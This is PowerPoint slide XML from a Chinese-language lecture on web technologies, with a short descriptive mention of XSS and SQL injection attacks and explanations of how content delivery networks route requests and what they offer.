                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>页面、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>图像文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>等组成。所有这些组件相互协调为用户提供一组完整的服务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>大多数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>应用程序攻击都是通过跨站点脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>注入攻击发生的，而这些攻击通常是由于编码有缺陷和未能清理应用程序输入和输出而造成的。同时攻击被列为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CWE/SANS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>最危险的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>个编程错误。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 2" descr="Advanced Web Technologies">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB36C0F-DDA7-EA4C-9F2D-2CF362746C4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55104" y="1021312"/>
            <a:ext cx="4622419" cy="2291949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="图片 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE161D65-20FB-0149-B3E8-6703FF0BE5A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5898362" y="3544740"/>
            <a:ext cx="5545088" cy="1128714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="图片 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A356C44D-3012-7142-B383-94479EA77E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="5032054"/>
            <a:ext cx="4670614" cy="1452208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F2CF2BC-FDA8-C04F-BD93-88C7E5B91B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7700685" y="4698865"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>非持久型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="文本框 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10BB4B23-2E84-EB4B-9F5C-B84ACD1879F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620456" y="6355785"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>持久型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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4978565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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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09450" y="2914800"/>
            <a:ext cx="4622419" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Content Delivery Network, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>内容分发网络）是当前提高网站的性能、可靠性与安全性的最佳实践之一，它是由分布在不同地理位置的服务器集群组成的分布式网络，目标是帮助其客户网站实现负载均衡、降低网络延迟、提升用户体验、过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入等攻击，分散拒绝服务攻击的流量。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2269877-799F-A84A-874B-0910CD5BC59A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3376205"/>
            <a:ext cx="4872890" cy="1515366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17158479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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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23820" y="1182253"/>
            <a:ext cx="4622419" cy="7571303"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>①、当用户点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>APP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上的内容，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>APP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（域名解析系统）寻求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址解析。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>②、本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统会将域名的解析权交给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>专用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>③、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>专用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的全局负载均衡设备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址返回用户。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>④、用户向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>的负载均衡设备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发起内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>⑤、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>负载均衡设备根据用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址，以及用户请求的内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，选择一台用户所属区域的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓存服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>⑥、负载均衡设备告诉用户这台缓存服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址，让用户向所选择的缓存服务器发起请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>⑦、用户向缓存服务器发起请求，缓存服务器响应用户请求，将用户所需内容传送到用户终端。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>⑧、如果这台缓存服务器上并没有用户想要的内容，那么这台缓存服务器就要网站的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>源服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求内容。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>⑨、源服务器返回内容给缓存服务器，缓存服务器发给用户，并根据用户自定义的缓存策略，判断要不要把内容缓存到缓存服务器上。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="https://pic2.zhimg.com/v2-5e53690a7bfaace4a5a61d1c2bfab609_b.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F696028F-92AB-4F21-AD5C-8F1AF609F8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80794" y="1462038"/>
            <a:ext cx="4810548" cy="4456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03002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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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71946" y="1402259"/>
            <a:ext cx="4622419" cy="8679299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>的好处</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术，最大的好处，就是加速了网站的访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户与内容之间的物理距离缩短，用户的等待时间也得以缩短。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>而且，分发至不同线路的缓存服务器，也让跨运营商之间的访问得以加速。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如中国移动手机用户访问中国电信网络的内容源，可以通过在中国移动假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器，进行加速。效果是非常明显的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此外，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>还有安全方面的好处。内容进行分发后，源服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被隐藏，受到攻击的概率会大幅下降。而且，当某个服务器故障时，系统会调用临近的健康服务器，进行服务，避免对用户造成影响。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>正因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的好处很多，所以，目前所有主流的互联网服务提供商，都采用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术。所有的云服务提供商，也都提供了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务（价格也不算贵，按流量计费）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE8EBA04-8EC8-49C1-9FA5-6C958D27BC35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5809094" y="3050997"/>
            <a:ext cx="5710960" cy="2038496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3872912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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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71946" y="1402259"/>
            <a:ext cx="4622419" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
